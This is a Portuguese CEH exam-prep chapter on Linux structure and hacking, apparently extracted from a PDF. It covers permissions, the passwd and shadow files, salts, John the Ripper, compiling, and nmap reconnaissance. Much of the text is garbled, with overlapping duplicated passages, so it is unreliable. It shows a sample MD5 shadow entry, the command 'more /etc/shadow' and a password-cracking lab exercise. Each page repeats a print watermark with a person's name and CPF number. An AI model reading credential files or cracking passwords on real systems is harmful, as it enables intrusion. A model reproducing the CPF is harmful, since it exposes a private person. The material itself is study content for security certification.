Comandos e Estruturas do Linux
Comandos e Estruturas do Linux
Capítulo 5. Linux
Linux e ferramentas de avaliação automática Segurança.
automática de Segurança
Capítulo
Tudo no Linux é um arquivo. Esses arquivos são5organizados em um sistema de pastas e
diretórios. Diretórios
Tradução: Roque Cerávolo comuns em Linux incluem etc. A pasta contém configurações
específicas de acolhimento e os arquivos passwd e shadow.
Comandos básicos
Este capítulo ajuda do Linux incluem
a preparar ls, cat, moreHac
para o Certificado , cdker
, e vi.
Ético do Exame CE -Conselho
(CEH)., abrangendo as seguintes objetivos do CE -Conselho que incluem a compreensão dos
Identificar
aspectos do anegócio
estrutura de arquivos
de testes do Linux
de penetração. Issoe diretór ios comuns.
inclui itens como:
Identificar o usuário root e saber as IDs de usuário e de grupo.
hackeado.
Identificar como o Linux é hackeado.
Comandos básicos do Linux incluem ls, cat, more, cd, e vi.
Identificar o usuário root e saber as IDs de usuário e de grupo.
1
Acesso para usuários e processos do sistema é atribuído um ID de usuário (UID) e
Descreva como (GID).
um ID de grupo programas
Root Linux
(Raiz) são
temcompilados,
um UID de 0carregados,
e um GUID edecomprimidos
0.
Identificar como
Compilando o Linux
no Linux é hackeado
geralmente requer três etapas.
Impresso por Evanildo Conceiçao, CPF 030.567.395-51 para uso pessoal e privado. Este material pode ser protegido por direitos
autorais e não pode ser reproduzido ou repassado para terceiros. 26/03/2021 19:14:24
Descrever
Descrev seguro.
er como o Linux é seguro.
Linux é hackeado,
Os rootkits são um seguindo
conjunto ademesma metodologia
ferramentas básica como
que permitem Windows,
que um que é: um
hacker possua
Reconhecimento, varredura e enumeração, o acesso, a escalada de privilégios,
sistema.
Descrev Eles
er normalmente éoferecem um acesso backdoor, coletam informações
mantendo ocomo o Linux
acesso, seguro
e cobrindo faixas e colocação de backdoors.
sobre outros sistemas na rede, permitim a operação de processos ocultos, e muito
mais.
.
automatizados.
Discutir os diferentes tipos de instrumentos de avaliação automatizados.
Linux é seguro por praticar defesa em profundidade. Isto significa garantir
fisicamente e logicamente, aplicação de patches, desligando serviços não utilizados,
Estas ferramentas
Explicar rootkits podem escanear um grande número de sistemas e permitem que
eaplicações
contramedidas.
endurecimentos,
hackers éticos se econcentram de outras
em medidas
áreas-chave. de defesas.
Estas ferramentas variam de freeware
a comercial.
estudo.
Estratégias de estudo.
Os rootkits são um conjunto de ferramentas que permitem que um hacker possua um
sistema. Eles normalmente oferecem um acesso backdoor, coletam informações
sobreaborda
Estecapítulo
outrosassistemas na rede,
as informações que
permitim a operação deas processos ocultos, e muito
Discutir
mais. os diferentes tipos devocê precisa saberdesobre
instrumentos as ferramentas
ferramenta
avaliação s de avaliação
automatizados
Linux e automatização.
automatização. Para ganhar uma compreensão
compreensão mais profunda
profunda dos temas:
.
Especificar as fformas
ormas que o Linux pode ser seguro.
seguro.
Este capítulo aborda as informações que você precisa saber sobre as ferramentas de avaliação
Linux e automatizaç
Descrever ão. Para ganhar
pormenorizadamente
pormenorizadamente uma compreensão
a estrutura do arquivomais profunda dos temas:
passwd.
Entender os diferentes
diferentes tipos de instrumentos
instrumentos de avaliação
avaliação e saber a diferença entre os scanners de
código fonte da aplicação,
aplicação, scanners, monitores
monitores e scanners de nível
nível de sistema.
Carregar o Linux e se familiarizar com a estrutura do arquivo.
Descrever como
como automatizar exploração
exploração usando toolssuch como Metasploit
Metasploit e Impacto Core.
Core.
Praticar o uso de ferramentas como John the Ripper.
Introduçãoos caminhos que o Linux é hackeado.
Compreender
Este capítulo apresenta
apresenta o Linux. Linux é usado para alimentar muitos
muitos dos servidores encontrados
encontrados ao redor
Especificar as formas que o Linux pode ser seguro.
2
Descrever pormenorizadamente a estrutura do arquivo passwd.
Entender os diferentes tipos de instrumentos de avaliação e saber a diferença entre os scanners de
código fonte da aplicação, scanners, monitores e scanners de nível de sistema.
Descrever como automatizar exploração usando toolssuch como Metasploit e Impacto Core.
Impresso por Evanildo Conceiçao, CPF 030.567.395-51 para uso pessoal e privado. Este material pode ser protegido por direitos
autorais e não pode ser reproduzido ou repassado para terceiros. 26/03/2021 19:14:24
do mundo. É um sistema
sistema operacional robusto
robusto e completo. Ele é o favorito de
de um hacker, porque é fácil para
desenvolver programas,
programas, e é uma grande
grande plataforma para construir
construir e testar ferramentas
ferramentas de segurança.
segurança. Nós
olhamos para o Linux básico,
básico, como as senhas
senhas são armazenadas, e o formato que eles são armazenados
armazenados
Hacking dentro do Linux
Linux também é discutido,
discutido, e você começará a ver que, embora as ferramentas
ferramentas de
hacking podem mudar, todo
todo o processo é o mesmo que a pirataria
pirataria do Windows.
conter outros diretórios e arquivos. Diretórios comuns no sistema de arquivos Linux podem ser vistos na
Figura 5.1.
/ Representa o diretório
diretório raiz.
Barrasarquivos
/ dev Contém são usadas
arquivos quepara separar nomes
representam de dire
os pontos
os detórios
acessoem Linux. Unidad
a dispositivos
dispositivos esseus
em físicas
seu são tratadas
s sistemas. Estes de
podem
maneira
incluir diferentediscos
disquetes, do que o DOSe. CD
rígidos O diretóri
-ROMs.o / usr poderia estar em um disco rígido separado, ou / mnt
pode conter uma pasta chamada / armazenamento que é na verdade uma unidade de outro computador.
/ etc Contém arquivos de de configuração administrativa,
administrativa, o arquivo
arquivo passwd, e o arquivo
arquivo de sombra (shadow).
Alguns dos diretórios mais comuns encontrados em um sistema Linux são descritos aqui:
/ home Contém os diretórios
diretórios home dos usuários.
/ Representa o diretório raiz.
/ mnt Fornece um local
local para dispositivos de montagem, tais como CD-R -ROMs
OMs e disquetes.
/ bin Contém comandos comuns de usuários Linux, como ls, data de classificação, e chmod.
/ sbin Contém comandos administrativos e processos
processos daemon.
/ dev Contém arquivos que representam os pontos de acesso a dispositivos em seus sistemas. Estes podem
incluir disquetes, discos rígidos e CD-ROMs. 4
/ etc Contém arquivos de configuração administrativa, o arquivo passwd, e o arquivo de sombra (shadow).
Alerta de exame
Diretórios e arquivos
arquivos em um sistema Linux são configurados
configurados para que o acesso
acesso possa ser controlado.
Quando
/ usr Contém documentação do utilizador, os ficheiros gráficos, bibliotecas,usuário
você efetuar l
login
ogin no sistema, será identifi
identificado
cado por uma c
conta
onta de . Alémuma
assim como de sua conta de
variedadedede
usuário, você pode epertencer
outros utilizadores per tencer a um
comandos grupo
adminis ou grupos.
grup
trativos e os. Portanto, os arquivos
arquivos. arquivos podem ter permissões
permissões de
conjunto para um usuário,
usuário, um grupo, ou outros.
outros. Por exemplo, o Linux Red
Red Hat suporta três grupos
grupos padrões:
padrões:
super usuários, usuários do sistema, e usuários
usuários normais. De acesso para cada um um destes grupos
grupos tem três
Certifique-se de que você sabe e entender a estrutura básica de arquivos Linux.
Alerta de exame
opções:
Ler
Escrever
Diretórios e arquivos em um sistema Linux são configurados para que o acesso possa ser controlado.
Executar
Quando você efetuar login no sistema, será identificado por uma conta de usuário. Além de sua conta de
Para ver você
usuário, as permissões
permiss
pode ões atuais,aoum
pertencer proprietário
grupo ou egrup
de os.
grupo para um
Portanto, osarquivo
arquivo oupodem
arquivos diretório, digita oões
ter permiss comando
comando
de
ls-l
ls-l.
-l. Isto
conjunto irá
para um usuário, um grupo, ou outros. Por exemplo, o Linux Red Hat suporta três grupos todos
exibir o conteú
conteúdo do do diretório que você está com os privilégi
privilégios
os para o usuário, grupo e os:
padrões
outros. Por exempl
exemplo, o, a lista de um arquivo cha
chamado
mado demofile e o diretório demod
demodirir seria semelhante
super usuários, usuários do sistema, e usuários normais. De acesso para cada um destes grupos tem três ao
seguinte:
opções:
drwxr-xr
drwxr-
xr
xr-x
-x 2 mikeg users 32768 Nov 20 00:31 demodir
Ler
-rw-r--r--Escrever
1 mikeg users 4108 Nov 16 11:21 demofile
Executar
As permissões são listados
listados na primeira coluna. A primeira letra é se o item item é um diretório ou um arquivo.
arquivo. Se
Para ver as permiss ões atuais, o proprietário
a primeira letra é d, o item é um diretório, como e de grupo para um arquiv
como no primeiro item listado o ou diretório, digita
listad anteriormente, dem o co
demodir mando
odir.
odir . Para o
ls-l. Isto irá
demofile exibir oaconteú
arquivo, primeira
primeiradoletra
do diretório que vocênove
é --.. Os próximos nestá
ove com os privilégi
caractere
caracteres os para
s denotam o usuário,
acessar e temgrupo e todos os
a seguinte
outros.
forma, rwxPor |exempl
rwx | o,rwx.
rwx.a lista
Listade
osumtrêsarquivo
primeiroschamado demofile
direitos e odo
de acesso ddiretório
o usuário,demod ir seria
portanto, semelhante
para demodir, oao
demodir,
seguinte:
usuário ler, escrever e executar privilégios. Os próximos três bits denotam denotam os dir direitos
eitos de grupo, portanto,
portanto, o
grupo ler e executar privilégios para a pasta demodir emodir.. Finalmente, os últimos
últimos três bits especificam
especificam o acesso
de todos os outros têmtêm para a pasta demodir. Nes Neste
te caso, eles têm
têm de ler e executar privilégios.
privilégios. A terceira
coluna, mikeg, especifica
especifica o proprietário do do arquivo / diretório,
diretório, e a quarta
quarta coluna, os usuários,
usuários, é o nome do
drwxr- xr -x 2 mikeg users
grupo para o arquivo / diretório 32768
diretório Nov 20 00:31 demodir
tório.. O único que pode modificar ou excluir qualquer arquivo neste diretório diretório é
o mikeg proprietário.
-rw-r--r-- 1 mikeg users 4108 Nov 16 11:21 demofile
As permissões são listados na primeira coluna. A primeira letra é se o item é um diretório ou um arquivo. Se
a primeira
O comandoletra é d,éousado
chmod itemoépor
usad umum diretório, como
proprietári
proprietário noarquivo
o do primeiroouitem listado anteriormente,
administrador
administrador para alterar dem
para odir. Para
a definição de o
demofile arquivo,
permissões de acesso a pri meira letra é - . Os
acesso a um arquivo ou conjunto próximos nove caractere
conjunto de arquivos. Chmod s denotam acessar
Chmod pode ser utilizada e tem a seguinte
utilizada nos modos
forma, rwxe| absoluto.
simbólicas rwx | [Link]
Lista ossimbólicas
três primeiros
com direitos
símbolosde
símbolos acesso
como doenquanto
rwx, usuário,
enq uanto portanto, para demodir,
ofertas absolutos com valores
com o
usuário
octais.
octais ler, escrever
. Para cada um edos executar privilégios.
três conjuntos
conjun Os próximos
tos de permissão detrês
um bits denotam
FILEREAD, os direitos
escrever de grupo,
Read portant
e executeRead
execute o, o
é atribuído
grupo
o ler e4,executar
número privilégios
de escrita é atribuído
atribuídpara a pasta d2,
o o número emodir
exec. utar
Finalmente,
e executar os últi
é atribuído mos trê[Link]
o número especifica
Para mse
certificar- o acesso
de que
de todos os outros têm para a pasta demodir. Neste caso, eles têm de ler e executar privilégios. A terceira
coluna, mikeg, especifica o proprietário do arquivo / diretório, e a quarta coluna, os usuários, é o nome do 5
grupo para o arquivo / diretório. O único que pode modificar ou excluir qualquer arquivo neste diretório é
o mikeg proprietário.
O comando chmod é usado por um proprietário do arquivo ou administrador para alterar a definição de
permissões de acesso a um arquivo ou conjunto de arquivos. Chmod pode ser utilizada nos modos
Impresso por Evanildo Conceiçao, CPF 030.567.395-51 para uso pessoal e privado. Este material pode ser protegido por direitos
autorais e não pode ser reproduzido ou repassado para terceiros. 26/03/2021 19:14:24
as permissões estão
estão bem abertos para si mesmo,
mesmo, o grupo e todos os usuários,
usuários, o comando seria chm
chmod
od 777
demofile.
Alerta de exame
as permissões estão bem abertos para si mesmo, o grupo e todos os usuários, o comando seria chmod 777
Linux Básico
demofile.
Objetivo
Alerta de exame
Entender os comandos
comandos básicos do Linux
Linux
Você precisa entenoder
Identificar o equivalente
usuário binário
root e saber deIDarquivo
o sua e aseperm
de usuário issões de acesso à pasta. C omo um
grupo
exemplo, a representação binária de rwxr - r - seria 744.
2- segundo campo contém a senha criptografada. Você pode notar que o campo é marcadomarcado
por um x, neste caso, é porque esse sistema Linux em particular é o uso de senhas sombra,
que são realizadas no arquivo / etc / shadow. O arquivo shadow é usado
usado para aumentar a
segurança e está localizado em / etc / shadow. Senhas shadow são discutidos de forma mais
Você vai notar que root é a primeira conta na lista. Root é sempre atribuído a 0 UID e 0 GID.
completa,especiais
Outros usuários mais adiante neste
e contas capítulo. a serviços e daemons são listados após root e têm
associadas
valores abaixo de 100. Red Hat começa com usuários regulares em um UID de 500. Vamos dar uma
3- Ocada
olhada em terceiro
campo campo é o UID.
e discutir o seuUID Mike é 503.
significado. OlheQualquer arquivo
para a última Mike
listagem,possui
que é oouregistro
cria teráde
Mike, eeste
vamos analisar
número cada campo
associado a ele. e seu significado. Os campos são denotados por dois pontos.
1- O
4- nome de usuário
O quarto campo éé oo GID.
primeiro
GIDcampo.
Mike éMaiúscula
503. Vocêinicial nãoque
vai notar é usado
aG para
GIID evitar
e UID sãoconfusão
os
com superior/minúsculas.
mesmos, assim como a outros usuários listados no arquivo de senha mostrada anteriormente.
2- segundo campo contém a senha criptografada. Você pode notar que o campo é marcado 7
por um x, neste caso, é porque esse sistema Linux em particular é o uso de senhas sombra,
que são realizadas no arquivo / etc / shadow. O arquivo shadow é usado para aumentar a
segurança e está localizado em / etc / shadow. Senhas shadow são discutidos de forma mais
completa, mais adiante neste capítulo.
Impresso por Evanildo Conceiçao, CPF 030.567.395-51 para uso pessoal e privado. Este material pode ser protegido por direitos
autorais e não pode ser reproduzido ou repassado para terceiros. 26/03/2021 19:14:24
Este é o projeto sob o Red Hat, uma abordagem chamada de grupos de usuários privados.
5- O quinto campo é a descrição do usuário. Esta área possui informações descritivas sobre
o usuário. Por vezes, pode conter números de telefone, paradas
paradas de correio, ou alguma outra
outr a
informação de contato. Esta não é uma boa idéia de como ele pode ser relatado pelo
utilitário finger.
Adicionar
Senhas e ousuários
arquivoaoshadow
Linux é um processo bastante simples. Apenas o comando useradd. De
todos os usuários, o que exige uma maior proteção é a conta root, porque ela deve ser segura.
Embora os arquivos como passwd sejam lidos por todos, o arquivo shadow é legível apenas pelo
Linux requer que as contas de usuários tenham uma senha,
senha, mas por padrão, não vai impedi-lo de
usuário root. Se um atacante pode obter acesso à conta root, ele tem, essencialmente, tomado o
começar um um jogo em branco. Durante a instalação, o Linux dá ao usuário a opção de
controle do computador a partir de você. Por esta razão, a conta root deve ser protegida no nível
configurar o padrão de criptografia de senha. A maioria das versões do Linux, como a Red Hat,
mais alto. Isso significa que uma grande quantidade de tempo que os usuários exercem as suas
usa MD5 por padrão. Se você optar por não usar MD5, você pode escolher DES, embora limita
funções em um computador Linux com um a conta diferente de root. No entanto, algumas
as senhas a oito caracteres alfanuméricos. Linux também inclui o arquivo / etc / shadow para
funções exigem que você as execute como root. Para essas ocasiões, você vai querer usar o
segurança de senha adicional. Dê uma olhada em uma entrada de um arquivo / etc / shadow
Substituto do usuário de comando (SU). O comando SU lhe permitirá desempenhar funções
aqui:
como um usuário diferente daquele que você está logado. O comando é simplesmente
Senhas e o arquivo
<username> su. shadow
root:$1$Gjt/eO.e$pKFFRe9QRb4NLvSrJodFy.:0:0:root:/root:/bin/bash
Movendo as senhas para shadow torna menos provável que a senha criptografada
criptografada possa ser
decifrada, pois somente o usuário root tem acesso ao arquivo shadow.
shadow. O formato do arquivo de
Linux requer que as contas
senha é formatado como segue:de usuários tenham uma senha , mas por padrão, não vai impedi-lo de
começar um um jogo em branco. Durante a instalação, o Linux dá ao usuário a opção de
Account_name:Password:Last:Min:Max:Warn:Expire:Disable:Reserved
configurar o padrão de criptografia de senha. A maioria das versões do Linux, como a Red Hat,
usa MD5 por padrão. Se você optar por não usar MD5, você pode escolher DES, embora limita
as root:$1$Gjt/eO.e$pKFFRe9QRb4NLvSrJodFy.:0:0:root:/root:/bin/bash
senhas a oito caracteres alfanuméricos. Linux também inclui o arquivo / etc / shadow para
segurança de senha adicional. Dê uma olhada em uma entrada de um arquivo / etc / shadow 8
aqui:
Movendo as senhas para shadow torna menos provável que a senha criptografada possa ser
Account_name:Password:Last:Min:Max:Warn:Expire:Disable:Reserved
Impresso por Evanildo Conceiçao, CPF 030.567.395-51 para uso pessoal e privado. Este material pode ser protegido por direitos
autorais e não pode ser reproduzido ou repassado para terceiros. 26/03/2021 19:14:24
more /etc/shadow
Outro fato interessante sobre sistemas Linux é que as senhas usam sais. Sais são necessários para adicionar
uma camada de aleatoriedade para as senhas. Porque MD5 é um algoritmo de hash, isso significa que se eu
usasse "segredo" para a minha senha e outro usuário usado "segredo" para a sua senha, valores
criptografados seria o mesmo. Um sal pode ser um dos valores de 4096 e ainda ajuda a embaralhar a
senha. No Linux, a senha MD5 é de 32 caracteres e começa com $ 1 $. Os caracteres entre o segundo e
terceiro $ representar o sal. No exemplo anterior, o valor que é GJT / eO.e. Senhas criadas desta maneira
são consideradas de ser one way. Isto é, não há uma maneira fácil de reverter o processo. Figura 5.2
demonstra como o Linux cria este valor.
Dica
Como o arquivo passwd é legível ao mundo, as senhas
senhas devem ser armazenados
armazenados no
no arquivo shadow.
O arquivo shadow não não é a única maneira de ajudar ajudar a proteger contra invasores que tentam evitar o
processo de autenticação.
autenticação. Há outras formas mais avançadasavançadas para proteger os recursos. As senhas são são
um das mais fracas formas
formas de autenticação. Há também algo algo que você tem (tokens) e algo algo que você é
(biometria). Se umum novo esquema de autenticação
autenticação que vai ser utilizada, é necessário
necessário que haja uma
forma de alertar as aplicações para esse fato fato sem ter que
que reescrever cada parte do código já
Dicadesenvolvido. A resposta
resposta a este desafio
desafio é PlPluggable Authentication Modules (PAM). PAM permite que
uggable Authentication
um programa projetado
projetado para renunciar
renunciar a preocupação
preocupação dos tipos de autenticação
autenticação que serãoserão executadas
e se concentrar no no próprio aplicativo. PAM é usado pelo FreeBSD, Linux, Solaris e outros. Seu papel é
Como o arquivo passwd é legível ao mundo, as senhas devem ser armazenados no arquivo shadow.
controlar
co ntrolar a interação
interação entre o usuário e autenticação. Isso Isso pode ser telnet, ftp, login no console,
console, ou
alterar uma senha. PAM PAM apoia os regimes
regimes mais fortes de autenticação, como como o Kerberos, S / Key, e
O arquivoO shadow
RADIUS. diretórionã
diretório o écontém
que a única os
maneira
módulos
módulos de específicos
ajudar a proteger
para ocontra
PAM está
PAM invasores
em / etcque tentam
m.d /.evitar o
/ pam.d
pa
processo de autenticação. Há outras formas mais avançadas para proteger os recursos. As senhas são
Alerta
um dasde Exame
mais fracas formas de autenticação. Há também algo que você tem (tokens) e algo que você é
(biometria).
Entender o quequeusão
Se m novo
sais eesquema de autenti
porque eles
porque cação que vai ser utilizada, é necessário que haja uma
sãoPlusados.
uggable Authentication Modules
forma de alertar as aplicações para esse fato sem ter que reescrever cada parte do código já
Toda essa conversa
desenvolvido. de ta
de
A respos senhas
a estetraz a questão
ques
desafi o é tão da segurança da senha.
senha. Assim como (PAM).noPAMmundo da que
permite
Microsoft,
um programa o Linux também
projetado tem
para renuuma
uma série
nciar de ferramentas
ferramentas
a preocupaçã o dosde quebra
tipos de senha
de autentic açãodisponível.
disponível.
que serãoJohn the
executadas
e se concentrar
Ripper denssas
é uma dessas o próprio aplicativo.
ferramentas (http
(httpPAM é usado pelo FreeBSD,
[Link]
://[Link]/John/
://[Link] m/John/).
m/John/ Linux, Solaris e outros.
ente, aSeu
). É, provavelmente,
provavelm mais papel é
conhecida,
controlar a mais versátil,
versátil,
interaçã o entremais rápida eprogra
o usuário programama de quebra
autenticação. de senhas
Isso pode senhas [Link],
ser telnet, O melhor
me lhor
login node tudo,e,éou
consol
alterar uma
gratuito [Link]
e suporta sPA
eisM apoia os diferentes
esquemas regimes mais de fortes
hash dedesenha
autenticação,
cobrco
que cobrememmo o Kerberos,
vários saboresSde
sabores / Key,
UNIXe e
Windows
RADIUS. OLANMan
diret
Alerta de Exame ório hashes.
que Pode
contém usar
os m listas
ódulos de palavras
específicosespecializadas
para o PA M ou
está regras
em / de
etc /senha
pa m.d c
com
om
/. base no
Toda essa conversa de senhas traz a questão da segurança da senha. Assim como no mundo da
Microsoft, o Linux também tem uma série de ferramentas de quebra de senha disponível. John the
Ripper é uma dessas ferramentas ([Link] É, provavelmente, a mais
Impresso por Evanildo Conceiçao, CPF 030.567.395-51 para uso pessoal e privado. Este material pode ser protegido por direitos
autorais e não pode ser reproduzido ou repassado para terceiros. 26/03/2021 19:14:24
tipo de personagem
personagem e colocação. Roda em em mais de 12 diferentes
diferentes sistemas operacionais.
operacionais. Vem pré-
instalado em muitas distribuições
distribuições Linux. Está incluído
incluído na versão do Linux Knoppix encontrado
encontrado no CD
neste livro. Antes de sair e começar a quebrar
quebrar senhas, gaste algun
algunss minutos para verificar as várias
opções emitindo -.-./john-h
/john-h na linha de comando.
comando. Você pode verificar queque John funciona executando
executando em
modo de teste. Irá gerar uma velocidade de de linha de base para o seu sistema de craqueamento.
craqueamento.
Candidatos ao teste
teste devem saber como os programas
programas de quebra
quebra de senha, como John
John the Ripper,
Ripper,
trabalh am..
trabalham
am
Desafio
Reveja os resultados do MD5 FreeBSD e benchmarks NT LM DES. As rachaduras por diferença (c
/ s) segundos entre os dois é um fator de mais de 500, o que significa que um ataque de força bruta
Proteção
completode senhas
levará maisé tão importante
de 500 vezes oem qualquer
tempo contraplataforma
os hashes como construir
de senha senhas
no sistema [Link]
FreeBSD que
desafio
contra de
Alerta terá
umexame que criar senhas de complexidade diferentes e tentar quebrá-las. O
sistema Windows. Um desses sistemas que você prefere mantem os dados críticos? objetivo é ver a
rapidez
Depois decom senhas
toda essa fracas podem
conversa sobreserquebra
quebradas. Vocêvocê
desenhas, vai precisar de uma
pode querer dar cópia do Linux
uma chance a siemesmo.
John
the Ripper
Se assim for,
Candidatos para realizar
aofaça
testeodevem este
exercícioexercício.
saberdocomo
desafioÉ sugerido
rogramas de quebra de senha, como John the Ripper, CD
os pabaixo. que você use a cópia do Linux incluído no
com este
trabalham livro. Ela pode ser carregada em um segundo CD que será auto-arranque. Como
alternativa, você também pode fazer download de DST Knoppix em: em: [Link] e instale em em
um cd. .
Proteção de senhas é tão importante em qualquer plataforma como construir senhas robustas. Este 10
desafio terá que criar senhas de complexidade diferentes e tentar quebrá-las. O objetivo é ver a
rapidez com senhas fracas podem ser quebradas. Você vai precisar de uma cópia do Linux e John
download
the Ripper para realizar este exercício. de DST
É sugerido queKnoppix ema: [Link]
você use cópia do Linux incluído no CD
com este livro. Ela pode ser carregada em um segundo CD que será auto-arranque. Como
alternativa, você também pode fazer e instale em
um 1)
cd.
Impresso por Evanildo Conceiçao, CPF 030.567.395-51 para uso pessoal e privado. Este material pode ser protegido por direitos
autorais e não pode ser reproduzido ou repassado para terceiros. 26/03/2021 19:14:55
3) Antes de tentar
tentar quebrar as senhas existentes, entre mais alguns usuários para ver o quão
rápido as senhas podem ser quebradas. Use o comando adduser para adicionar três usuários.
Nomeie os três usuários user1, user2 e user3. Defina a senha para cada usuário com
password,, ssw0rd P @ e! P @ ssw0rd1. Por exemplo, para adicionar o usuário user1 com o
password
diretório home / home/users/user1, digite o seguinte comando:
John the Ripper é uma ferramenta maravilhosa para hackers éticos para testar a força da senha, no
Objetivo:
entanto, ela não foi projetado para a atividade ilegal. Antes de usar esta ferramenta em uma rede de
produção, certifique-se
Descrever como que Linux
programas
programas você tenha autorizaos,
são compilados,
compilad çãocarregadas,
por escritoeda gerência
compri maior. John the Ripper realiza
comprimidas.
midas.
diferentes tipos de quebras: modo único; dicionário, ou o modo de lista de palavras, a realizada neste
exercício, que aplica uma lista de dicionário de senhas para comparação, e força bruta ou o modo
incremental, que é o mais
Em Linux, arquivos lento dos três m
são empacotados e odos e tenta todas
compactados as combinações
de várias [Link]
doseformatos
nú[Link]
the Ripper é portátil para vários sabores de UNIX, Linux e Windows, embora ele não tenha uma interface
compressão
gráfica. mais comuns é o programa de arquivamento em fita (Tar). Tar é um arquivo padrão e
foi originalmente desenvolvido como software de backup para UNIX. Ela recolhe vários arquivos
em um único arquivo. Ele não faz a compactação de arquivos e, portanto, um segundo programa é
necessário. Um programa
Comprimindo, chamado
Instalando gzip é umdo
e Compilan doso programas
Linux de compressão mais comuns de
arquivo.
Objetivo: Compilando um pacote de uma fonte de código tarball nem sempre é um procedimento
simples. Após descompactar o pacote, você deve procurar por um arquivo chamado README,
[Link],
Descrever [Link],
como programas ou algo similar.
Linux são compilados, carregadas, e compriEste arquivo geralmente descreve
midas.
o processo de configuração e instalação. Freqüentemente, o pacote fonte inclui um script chamado
configure, que você executa para ter o pacote de auto detecção de bibliotecas instaladas do seu
computador e configurar-se de forma adequada. Se assim for, o processo inclui três comandos:
comandos:
./configure
make
make install
Dica:
Certifique-se de que você sabe como saber se a senha foi colocada no shadow (shadowded).
Dica
Conheça os três comandos usados para compilar um programa em Linux.
./configure
make
Você pode
makequerer desenvolver programas de si mesmo, e se assim for, o Linux oferece-lhe essa
install
capacidade. Linux vem com o compilador GNU C (GCC). Esta capacidade também vem a calhar
quando você baixar um programa em C a partir de um site de segurança
segurança ou gostaria de verificar um
pedaço
Dica: de código de exploração.
exploração. Com o Linux, muitos
mui tos programas
programas não podem ser cumpridos para
você. O processo de compilação não é muito difícil, e um programa básico e os passos necessários
para compilá-lo são mostrados aqui:
Dica
[root@mg /root]#.vi hello.c
Certifique-se de que você sabe como saber se a senha foi colocada no shadow (shadowded).
#include <stdio.h>
int main(int argc, char ** argv)
{
printf("Hello world!\n");
Conheça
return 0;os três comandos usados para compilar um programa em Linux.
}
Você pode querer desenvolver programas de si mesmo, e se assim for, o Linux oferece-lhe essa
[root@mg /root]#. gcc -o hello hello.c
capacidade. Linux vem./hello
[root@mg /root]#. com o compilador
Hello world!GNU C (GCC). Esta capacidade também vem a calhar
quando você baixar um programa em C a partir de um site de segurança ou gostaria de verificar um
pedaço de código
[root@mg de exploraçã
/root]#.vi o. Com o Linux, mui tos programas não podem ser cumpridos para
hello.c
Em
você.primeiro lugar,
O processo
#include deocompilação
<stdio.h> código de programa foi difícil,
não é muito escrito,eneste caso, o editor
caso,
um programa básicovi efoi
osusado.
passosEm seguida,
necessários
ele
int
parafoi compiladoargc,
main(int
compilá-lo com
são ochar
comando
mostrados gcc-o. Finalmente, ele foi executado por executá-lo a partir da
** argv)
aqui:
{
janela de terminal. / Olá.
printf("Hello world!\n");
Note o. / Na frente do comando. IssoIsso garante que o Linux procure no
diretório 0;
return local para o executável especificado.
}
Hackeamento do Linux
[root@mg /root]#. gcc -o hello hello.c
[root@mg /root]#. ./hello Hello world!
Objetivo
Hacking de Linux segue a mesma metodologia de base discutida ao longo do livro. As etapas são
amplamente divididas em seis fases:
Em primeiro lugar, o código de programa foi escrito, neste caso, o editor vi foi usado. Em seguida,
eleReconhecimento.
1) foi compilado com o comando gcc-o. Finalmente, ele foi executado por executá-lo a partir da
janela de terminal. / Olá. Note o. / Na frente do comando. Isso garante que o Linux procure no
2) Escaneamento
Hackeamento
diretório doeLinux
local para enumeração.
o executável especificado.
Objetivo
3) Ganhar acesso.
4) Aumento de privilégio.
Mostrar com o Linux é hackeado
12
Hacking de Linux segue a mesma metodologia de base discutida ao longo do livro. As etapas são
amplamente divididas em seis fases:
1) Reconhecimento.
2) Escaneamento e enumeração.
Impresso por Evanildo Conceiçao, CPF 030.567.395-51 para uso pessoal e privado. Este material pode ser protegido por direitos
autorais e não pode ser reproduzido ou repassado para terceiros. 26/03/2021 19:14:55
5) Manutenção do acesso.
Cada uma dessas fases é discutida em mais detalhe para que você entenda melhor como essas
etapas se aplicam a sistemas Linux e UNIX.
Reconhecimento
Reconhecimento é a coleta de informações sobre passivo e ativo. Isso pode ser por escaneamento do
site organizacional, revendo postagens de emprego, procura nas lixeiras, engenharia
engenharia social, ou usar
qualquer das outras formas discutidas no Capítulo 2, "os fundamentos técnicos do Hacking".
5) Manutenção do acesso.
Dica.
6) Cobrir faixas e colocação de backdoors.
As mesmas técnicas básicas utilizadas para atacar
atacar sistemas
sis temas Linux
Linux também podem ser usadas para
Cada uma dessas fases é discutida em mais detalhe para
atacar computadores com Windows. Estas incluem informações que vocêtécnicas
entendapassivas
melhorecomo
ativasessas
de coleta
etapas se aplicam
Reconhecimento a sistemas Linux e UNIX.
de lixo, como mergulho, exploração portuária,
portuária, rever o site, ler anúncios de emprego, e assim por
diante.
Escanear
Escanear encontraé os
Reconhecimento anfitriões
a coleta e determinasobre
de informações que portas
passivoe aplicações que
e ativo. Isso possam
pode estar
ser por em execução.
escaneamento do
Aqui, você pode ver os resultados que vão começar a diferenciar os sistemas Windows e
site organizacional, revendo postagens de emprego, procura nas lixeiras, engenharia social, ou usar Linux.
Uma grande
Dica.
qualquer das pista
outrasé portas
formasabertas, como
discutidas no 21, 37, 79,2,111
Capítulo "os efundamentos
6000. Aquelas representam
representam
técnicos programas,
do Hacking".
como o Secure Shell (SSH), tempo, finger, sunrpc e X11. Porto scanners scanners e fingerprinting de
software OS serão as ferramentas do comércio. Como um exemplo, considerar considerar uma varredura
executado em um sistema Linux:
As mesmas técnicas básicas utilizadas para atacar sis temas Linux também podem ser usadas para
atacar computadores
[root@mg /root]# comnmapWindows. Estas incluem informações técnicas passivas e ativas de coleta
-O [Link]
de lixo, como mergulho, exploração portuária, rever o site, ler anúncios de emprego, e assim por
Starting
Escanear nmap V. 3.93 ([Link]/nmap/)
diante.
Interesting ports on unix1 ([Link]):
(The 1529 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
23/tcp open telnet
Escanear encontra os anfitriões e determina que portas e aplicações que possam estar em execução.
25/tcp open smtp
Aqui,
37/tcpvocê pode
openver os resultados
time que vão começar a diferenciar os sistemas Windows e Linux.
Uma grande pista
79/tcp opené portas abertas,
finger como 21, 37, 79, 111 e 6000. Aquelas representam programas,
111/tcp open sunrpc
como o
[root@mgSecure
139/tcp /root]#
Shell
filtered
(SSH),
nmap -Otempo, finger, sunrpc e X11. Porto scanners e fingerprinting de
[Link]
netbios-ssn
software
513/tcp OS serão
open as ferramentas
login do comércio. Como um exemplo, considerar uma varredura
Starting
1103/tcp emnmap V. 3.93 ([Link]/nmap/)
executado
Interesting um
open sistema Linux:
ports on unix1
xaudio
2049/tcp open nfs ([Link]):
(The 1529
4045/tcp ports
open scanned but not shown below are in state: closed)
lockd
Port
